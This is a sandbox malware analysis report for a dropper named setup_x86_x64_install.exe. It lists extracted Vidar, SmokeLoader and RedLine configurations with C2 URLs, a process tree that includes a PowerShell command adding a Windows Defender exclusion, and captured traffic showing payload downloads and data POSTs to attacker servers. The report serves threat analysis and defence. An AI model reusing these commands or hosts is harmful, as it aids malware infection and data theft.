Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23/09/2021, 21:08 UTC
210923-zyzyaafbfr 1022/09/2021, 10:40 UTC
210922-mqyzssehck 1022/09/2021, 05:21 UTC
210922-f114ksecck 1021/09/2021, 05:29 UTC
210921-f6zspsgdg2 1020/09/2021, 21:51 UTC
210920-1qj3jafed9 1020/09/2021, 19:44 UTC
210920-yftswafca9 1020/09/2021, 08:28 UTC
210920-kczcasgahr 1020/09/2021, 04:42 UTC
210920-fb3acafedj 1020/09/2021, 04:42 UTC
210920-fb2zksfecr 10Analysis
-
max time kernel
12s -
max time network
112s -
platform
windows10_x64 -
resource
win10-jp -
submitted
20/09/2021, 04:42 UTC
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5280 3348 rundll32.exe 24 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral6/memory/5424-328-0x000000000041C5DA-mapping.dmp family_redline behavioral6/memory/584-245-0x0000000005260000-0x000000000527D000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000600000001ab35-171.dat family_socelars behavioral6/files/0x000600000001ab35-143.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral6/memory/4920-235-0x0000000000A10000-0x0000000000AE4000-memory.dmp family_vidar behavioral6/memory/4920-236-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000400000001ab2c-123.dat aspack_v212_v242 behavioral6/files/0x000400000001ab2c-126.dat aspack_v212_v242 behavioral6/files/0x000400000001ab2e-128.dat aspack_v212_v242 behavioral6/files/0x000400000001ab2e-131.dat aspack_v212_v242 behavioral6/files/0x000400000001ab2b-125.dat aspack_v212_v242 behavioral6/files/0x000400000001ab2b-124.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4040 setup_installer.exe 3576 setup_install.exe -
Loads dropped DLL 6 IoCs
pid Process 3576 setup_install.exe 3576 setup_install.exe 3576 setup_install.exe 3576 setup_install.exe 3576 setup_install.exe 3576 setup_install.exe -
resource yara_rule behavioral6/files/0x000500000001ab70-288.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com 37 ipinfo.io 38 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1324 1936 WerFault.exe 88 5664 1936 WerFault.exe 88 -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4344 wrote to memory of 4040 4344 setup_x86_x64_install.exe 76 PID 4344 wrote to memory of 4040 4344 setup_x86_x64_install.exe 76 PID 4344 wrote to memory of 4040 4344 setup_x86_x64_install.exe 76 PID 4040 wrote to memory of 3576 4040 setup_installer.exe 77 PID 4040 wrote to memory of 3576 4040 setup_installer.exe 77 PID 4040 wrote to memory of 3576 4040 setup_installer.exe 77 PID 3576 wrote to memory of 4524 3576 setup_install.exe 80 PID 3576 wrote to memory of 4524 3576 setup_install.exe 80 PID 3576 wrote to memory of 4524 3576 setup_install.exe 80 PID 3576 wrote to memory of 4532 3576 setup_install.exe 138 PID 3576 wrote to memory of 4532 3576 setup_install.exe 138 PID 3576 wrote to memory of 4532 3576 setup_install.exe 138 PID 3576 wrote to memory of 4560 3576 setup_install.exe 81 PID 3576 wrote to memory of 4560 3576 setup_install.exe 81 PID 3576 wrote to memory of 4560 3576 setup_install.exe 81 PID 3576 wrote to memory of 2280 3576 setup_install.exe 137 PID 3576 wrote to memory of 2280 3576 setup_install.exe 137 PID 3576 wrote to memory of 2280 3576 setup_install.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:4136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵PID:4424
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵PID:4792
-
C:\Users\Admin\AppData\Roaming\2606592.scr"C:\Users\Admin\AppData\Roaming\2606592.scr" /S6⤵PID:3812
-
-
C:\Users\Admin\AppData\Roaming\7475752.scr"C:\Users\Admin\AppData\Roaming\7475752.scr" /S6⤵PID:5188
-
-
C:\Users\Admin\AppData\Roaming\4762554.scr"C:\Users\Admin\AppData\Roaming\4762554.scr" /S6⤵PID:68
-
-
C:\Users\Admin\AppData\Roaming\3061297.scr"C:\Users\Admin\AppData\Roaming\3061297.scr" /S6⤵PID:4360
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:3196
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6566⤵
- Program crash
PID:1324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6726⤵
- Program crash
PID:5664
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun198361825f4.exeSun198361825f4.exe5⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\tmp623F_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp623F_tmp.exe"6⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\tmp623F_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp623F_tmp.exe7⤵PID:5268
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:4708
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵PID:584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵PID:3656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵PID:4412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵PID:2280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵PID:4532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun1905815e51282417.exeSun1905815e51282417.exe1⤵PID:596
-
C:\Users\Admin\AppData\Local\Temp\is-48904.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-48904.tmp\Sun1966fb31dd5a07.tmp" /SL5="$7005C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun1966fb31dd5a07.exe"1⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\is-3TOOE.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-3TOOE.tmp\Ze2ro.exe" /S /UID=burnerch22⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe1⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun191101c1aaa.exeSun191101c1aaa.exe1⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"3⤵PID:5308
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:3036
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:1244
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe1⤵PID:4748
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe1⤵PID:4080
-
C:\Users\Admin\Documents\0FQR8FSXT1mih_Dzp5pdCtqh.exe"C:\Users\Admin\Documents\0FQR8FSXT1mih_Dzp5pdCtqh.exe"2⤵PID:5708
-
-
C:\Users\Admin\Documents\34AdyjjKyODet9DOMmJwQd4i.exe"C:\Users\Admin\Documents\34AdyjjKyODet9DOMmJwQd4i.exe"2⤵PID:5696
-
-
C:\Users\Admin\Documents\8TSiTgJ3O0J20QQsNXpHftbR.exe"C:\Users\Admin\Documents\8TSiTgJ3O0J20QQsNXpHftbR.exe"2⤵PID:5684
-
-
C:\Users\Admin\Documents\JjFjhZCilZN8a8DmsY5z4KlC.exe"C:\Users\Admin\Documents\JjFjhZCilZN8a8DmsY5z4KlC.exe"2⤵PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF1D501\Sun193fda712d9f1.exeSun193fda712d9f1.exe1⤵PID:320
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5280 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5324
-
-
C:\Users\Admin\AppData\Roaming\4762554.scr"C:\Users\Admin\AppData\Roaming\4762554.scr"1⤵PID:5424
Network
-
Remote address:8.8.8.8:53Requesthsiens.xyzIN AResponsehsiens.xyzIN A104.21.87.76hsiens.xyzIN A172.67.142.91
-
GEThttp://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=19Sep0704PM_UPD18Sep&oname[]=Ebo&oname[]=Pyi&oname[]=jog&oname[]=tra&oname[]=Der&oname[]=GCl&oname[]=you&oname[]=lih&oname[]=Ani&oname[]=dir&oname[]=pdf&oname[]=ult&cnt=12Remote address:104.21.87.76:80RequestGET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=19Sep0704PM_UPD18Sep&oname[]=Ebo&oname[]=Pyi&oname[]=jog&oname[]=tra&oname[]=Der&oname[]=GCl&oname[]=you&oname[]=lih&oname[]=Ani&oname[]=dir&oname[]=pdf&oname[]=ult&cnt=12 HTTP/1.1
Host: hsiens.xyz
Accept: */*
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jA5zxww9u2%2BwvARa9YzuS9mmDOJ%2Fs9lVPyxOOFPbcuX4m0dgabAPQDGYUii6GNfJs6N3oCo1A6XmP4CVbF8AdwDT524o5ye7EoBaOajMFgTDzT%2Bb8sM%2B4ARP4%2Fh0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6918805d79bc4184-AMS
-
Remote address:8.8.8.8:53Requestwww.listincode.comIN AResponsewww.listincode.comIN A144.202.76.47
-
Remote address:37.0.10.244:80RequestGET /server.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 37.0.10.244
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 19 Sep 2021 15:47:03 GMT
ETag: "13-5cc5b136d655a"
Accept-Ranges: bytes
Content-Length: 19
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
-
Remote address:51.178.186.149:80RequestGET /base/api/statistics.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 51.178.186.149
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
X-Powered-By: PHP/8.0.10
Content-Length: 96
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.135.233cdn.discordapp.comIN A162.159.133.233
-
Remote address:8.8.8.8:53Requestsafialinks.comIN AResponsesafialinks.comIN A162.0.214.42
-
Remote address:162.0.214.42:80RequestHEAD /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 17 Sep 2021 17:01:28 GMT
ETag: "74c00-5cc33e1d84a00"
Accept-Ranges: bytes
Content-Length: 478208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:162.0.214.42:80RequestGET /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 17 Sep 2021 17:01:28 GMT
ETag: "74c00-5cc33e1d84a00"
Accept-Ranges: bytes
Content-Length: 478208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 15
X-Rl: 38
-
Remote address:8.8.8.8:53Requestc.goatgameh.comIN AResponsec.goatgameh.comIN A104.21.89.157c.goatgameh.comIN A172.67.189.151
-
Remote address:8.8.8.8:53Requestdependstar.barIN AResponsedependstar.barIN A172.67.160.135dependstar.barIN A104.21.14.200
-
Remote address:8.8.8.8:53Requestactivityhike.comIN AResponseactivityhike.comIN A95.142.37.102
-
Remote address:95.142.37.102:80RequestGET /files/matthew14.exe HTTP/1.1
Host: activityhike.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Mon, 20 Sep 2021 05:02:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://activityhike.com:443/files/matthew14.exe
-
Remote address:8.8.8.8:53Requestpetrenko96.tumblr.comIN AResponsepetrenko96.tumblr.comIN A74.114.154.18petrenko96.tumblr.comIN A74.114.154.22
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.59.81
-
Remote address:51.178.186.149:80RequestPOST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 5917
Host: 51.178.186.149
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
X-Powered-By: PHP/8.0.10
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:51.178.186.149:80RequestPOST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 51.178.186.149
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
X-Powered-By: PHP/8.0.10
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:37.0.10.244:80RequestHEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 37.0.10.244
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
-
Remote address:37.0.10.244:80RequestGET /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 37.0.10.244
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
-
Remote address:8.8.8.8:53Requeststatuse.digitalcertvalidation.comIN AResponsestatuse.digitalcertvalidation.comIN CNAMEocsp.digicert.comocsp.digicert.comIN CNAMEcs9.wac.phicdn.netcs9.wac.phicdn.netIN A72.21.91.29
-
Remote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A88.99.66.31
-
GEThttp://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3DRemote address:72.21.91.29:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: statuse.digitalcertvalidation.com
ResponseHTTP/1.1 200 OK
Age: 1281
Cache-Control: max-age=119955
Content-Type: application/ocsp-response
Date: Mon, 20 Sep 2021 05:02:45 GMT
Etag: "61474287-1d7"
Expires: Tue, 21 Sep 2021 14:22:00 GMT
Last-Modified: Sun, 19 Sep 2021 14:00:39 GMT
Server: ECS (bsa/EB1C)
X-Cache: HIT
Content-Length: 471
-
Remote address:51.178.186.149:80RequestPOST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 51.178.186.149
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
X-Powered-By: PHP/8.0.10
Content-Length: 3776
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestwww.invch.comIN AResponsewww.invch.comIN A103.155.93.196
-
Remote address:103.155.93.196:80RequestHEAD /askhelp59/askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.invch.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Mon, 20 Sep 2021 05:02:47 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:103.155.93.196:80RequestGET /askhelp59/askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.invch.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Mon, 20 Sep 2021 05:02:47 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 259
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestprivacytoolz123foryou.topIN AResponseprivacytoolz123foryou.topIN A45.144.67.29
-
Remote address:45.144.67.29:80RequestHEAD /downloads/toolspab2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: privacytoolz123foryou.top
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Mon, 20 Sep 2021 05:03:01 GMT
ETag: W/"3d000-5cc663208db92"
Accept-Ranges: bytes
Content-Length: 249856
Connection: close
Content-Type: application/octet-stream
-
Remote address:45.144.67.29:80RequestGET /downloads/toolspab2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: privacytoolz123foryou.top
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Mon, 20 Sep 2021 05:03:01 GMT
ETag: W/"3d000-5cc663208db92"
Accept-Ranges: bytes
Content-Length: 249856
Connection: close
Content-Type: application/octet-stream
-
104.21.87.76:80http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=19Sep0704PM_UPD18Sep&oname[]=Ebo&oname[]=Pyi&oname[]=jog&oname[]=tra&oname[]=Der&oname[]=GCl&oname[]=you&oname[]=lih&oname[]=Ani&oname[]=dir&oname[]=pdf&oname[]=ult&cnt=12http559 B 798 B 6 5
HTTP Request
GET http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=19Sep0704PM_UPD18Sep&oname[]=Ebo&oname[]=Pyi&oname[]=jog&oname[]=tra&oname[]=Der&oname[]=GCl&oname[]=you&oname[]=lih&oname[]=Ani&oname[]=dir&oname[]=pdf&oname[]=ult&cnt=12HTTP Response
200 -
945 B 4.4kB 10 14
-
527 B 858 B 7 6
HTTP Request
GET http://37.0.10.244/server.txtHTTP Response
200 -
497 B 914 B 6 5
HTTP Request
GET http://51.178.186.149/base/api/statistics.phpHTTP Response
200 -
455 B 528 B 6 5
-
407 B 528 B 6 5
-
190 B 92 B 4 2
-
42.0kB 1.3MB 901 897
-
15.7kB 492.1kB 334 333
HTTP Request
HEAD http://safialinks.com/Installer_Provider/UltraMediaBurner.exeHTTP Response
200HTTP Request
GET http://safialinks.com/Installer_Provider/UltraMediaBurner.exeHTTP Response
200 -
728 B 672 B 5 4
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
69.7kB 4.4MB 1506 2949
-
11.8kB 622.1kB 243 470
-
8.5kB 480.2kB 176 340
-
220.5kB 14.0MB 4776 9412
-
269 B 862 B 4 11
HTTP Request
GET http://activityhike.com/files/matthew14.exeHTTP Response
301 -
7.8kB 461.3kB 161 321
-
550 B 5.4kB 8 7
-
875 B 6.6kB 8 10
-
7.2kB 1.1kB 14 8
HTTP Request
POST http://51.178.186.149/base/api/getData.phpHTTP Response
200HTTP Request
POST http://51.178.186.149/base/api/getData.phpHTTP Response
200 -
11.0kB 335.8kB 230 229
HTTP Request
HEAD http://37.0.10.244/download/NiceProcessX64.bmpHTTP Response
200HTTP Request
